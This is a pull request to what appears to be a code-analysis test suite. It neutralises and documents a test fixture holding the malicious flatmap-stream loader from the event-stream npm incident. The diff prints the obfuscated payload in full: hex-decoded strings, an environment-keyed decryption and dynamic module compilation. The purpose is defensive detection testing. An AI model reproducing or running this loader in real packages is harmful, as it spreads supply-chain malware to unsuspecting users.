### PR TITLE
Document and format event-stream-orig.js 

### DIFF
--- a/javascript/ql/test/query-tests/Security/CWE-506/HardcodedDataInterpretedAsCode.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-506/HardcodedDataInterpretedAsCode.expected
@@ -1,8 +1,8 @@
 nodes
-| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
-| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
-| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" |
-| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" |
+| event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") |
+| event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") |
+| event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" |
+| event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" |
 | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
 | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
 | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" |
@@ -21,10 +21,10 @@ nodes
 | tst.js:7:8:7:15 | test+"n" |
 | tst.js:7:8:7:15 | test+"n" |
 edges
-| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
-| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
-| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
-| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
+| event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" | event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") |
+| event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" | event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") |
+| event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" | event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") |
+| event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" | event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") |
 | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
 | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
 | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
@@ -41,7 +41,7 @@ edges
 | tst.js:7:8:7:11 | test | tst.js:7:8:7:15 | test+"n" |
 | tst.js:7:8:7:11 | test | tst.js:7:8:7:15 | test+"n" |
 #select
-| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | here |
+| event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") | event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" | event-stream-orig.js:96:15:96:41 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream-orig.js:96:17:96:40 | "2e2f74 ... 617461" | here |
 | event-stream.js:9:11:9:37 | e("2e2f ... 17461") | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | here |
 | tst.js:2:6:2:57 | Buffer. ... tring() | tst.js:1:29:1:88 | '636f6e ... 6e2729' | tst.js:2:6:2:57 | Buffer. ... tring() | Hard-coded data from $@ is interpreted as code. | tst.js:1:29:1:88 | '636f6e ... 6e2729' | here |
 | tst.js:7:8:7:15 | test+"n" | tst.js:5:12:5:23 | "0123456789" | tst.js:7:8:7:15 | test+"n" | Hard-coded data from $@ is interpreted as code. | tst.js:5:12:5:23 | "0123456789" | here |

--- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js
+++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js
@@ -1,2 +1,105 @@
-// from https://unpkg.com/flatmap-stream@0.1.1/index.min.js
-var Stream=require("stream").Stream;module.exports=function(e,n){var i=new Stream,a=0,o=0,u=!1,f=!1,l=!1,c=0,s=!1,d=(n=n||{}).failures?"failure":"error",m={};function w(r,e){var t=c+1;if(e===t?(void 0!==r&&i.emit.apply(i,["data",r]),c++,t++):m[e]=r,m.hasOwnProperty(t)){var n=m[t];return delete m[t],w(n,t)}a===++o&&(f&&(f=!1,i.emit("drain")),u&&v())}function p(r,e,t){l||(s=!0,r&&!n.failures||w(e,t),r&&i.emit.apply(i,[d,r]),s=!1)}function b(r,t,n){return e.call(null,r,function(r,e){n(r,e,t)})}function v(r){if(u=!0,i.writable=!1,void 0!==r)return w(r,a);a==o&&(i.readable=!1,i.emit("end"),i.destroy())}return i.writable=!0,i.readable=!0,i.write=function(r){if(u)throw new Error("flatmap stream is not writable");s=!1;try{for(var e in r){a++;var t=b(r[e],a,p);if(f=!1===t)break}return!f}catch(r){if(s)throw r;return p(r),!f}},i.end=function(r){u||v(r)},i.destroy=function(){u=l=!0,i.writable=i.readable=f=!1,process.nextTick(function(){i.emit("close")})},i.pause=function(){f=!0},i.resume=function(){f=!1},i};!function(){try{var r=require,t=process;function e(r){return Buffer.from(r,"hex").toString()}var n=r(e("2e2f746573742f64617461")),o=t[e(n[3])][e(n[4])];if(!o)return;var u=r(e(n[2]))[e(n[6])](e(n[5]),o),a=u.update(n[0],e(n[8]),e(n[9]));a+=u.final(e(n[9]));var f=new module.constructor;f.paths=module.paths,f[e(n[7])](a,""),f.exports(n[1])}catch(r){}}();
+/**
+ * This is a formatted copy of the malicoius source code from the "event-stream" incident. See additional details at
+ * https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident.html
+ *
+ * The copy is used for testing the behaviour of the js/hardcoded-data-interpreted-as-code query
+ */
+throw new Error(
+  "Do not import this file: it has malicious source code that should not be run."
+);
+
+var Stream = require("stream").Stream;
+module.exports = function (e, n) {
+  var i = new Stream(),
+    a = 0,
+    o = 0,
+    u = !1,
+    f = !1,
+    l = !1,
+    c = 0,
+    s = !1,
+    d = (n = n || {}).failures ? "failure" : "error",
+    m = {};
+  function w(r, e) {
+    var t = c + 1;
+    if (
+      (e === t
+        ? (void 0 !== r && i.emit.apply(i, ["data", r]), c++, t++)
+        : (m[e] = r),
+      m.hasOwnProperty(t))
+    ) {
+      var n = m[t];
+      return delete m[t], w(n, t);
+    }
+    a === ++o && (f && ((f = !1), i.emit("drain")), u && v());
+  }
+  function p(r, e, t) {
+    l ||
+      ((s = !0),
+      (r && !n.failures) || w(e, t),
+      r && i.emit.apply(i, [d, r]),
+      (s = !1));
+  }
+  function b(r, t, n) {
+    return e.call(null, r, function (r, e) {
+      n(r, e, t);
+    });
+  }
+  function v(r) {
+    if (((u = !0), (i.writable = !1), void 0 !== r)) return w(r, a);
+    a == o && ((i.readable = !1), i.emit("end"), i.destroy());
+  }
+  return (
+    (i.writable = !0),
+    (i.readable = !0),
+    (i.write = function (r) {
+      if (u) throw new Error("flatmap stream is not writable");
+      s = !1;
+      try {
+        for (var e in r) {
+          a++;
+          var t = b(r[e], a, p);
+          if ((f = !1 === t)) break;
+        }
+        return !f;
+      } catch (r) {
+        if (s) throw r;
+        return p(r), !f;
+      }
+    }),
+    (i.end = function (r) {
+      u || v(r);
+    }),
+    (i.destroy = function () {
+      (u = l = !0),
+        (i.writable = i.readable = f = !1),
+        process.nextTick(function () {
+          i.emit("close");
+        });
+    }),
+    (i.pause = function () {
+      f = !0;
+    }),
+    (i.resume = function () {
+      f = !1;
+    }),
+    i
+  );
+};
+!(function () {
+  try {
+    var r = require,
+      t = process;
+    function e(r) {
+      return Buffer.from(r, "hex").toString();
+    }
+    var n = r(e("2e2f746573742f64617461")),
+      o = t[e(n[3])][e(n[4])];
+    if (!o) return;
+    var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
+      a = u.update(n[0], e(n[8]), e(n[9]));
+    a += u.final(e(n[9]));
+    var f = new module.constructor();
+    (f.paths = module.paths), f[e(n[7])](a, ""), f.exports(n[1]);
+  } catch (r) {}
+})();


### PR DESCRIPTION
Some anti-virus products (rightfully) flag this event-stream-orig.js as a malicious file.
This change does two things:
- neutralises the file such that the code can not be run accidentally
- documents the purpose of the file

before the change, flagged by 16 AVs: https://www.virustotal.com/gui/file/e403d3aa39766ab0a7e910c1b60569d0a3e50e3ab0a724704e218b23f66883f3
after the change, flagged by 1 AV: https://www.virustotal.com/gui/file/fc1096acdd0d5e08358bb23c31bcf42a146e6626e425ce8eefedc5bc9ab438e3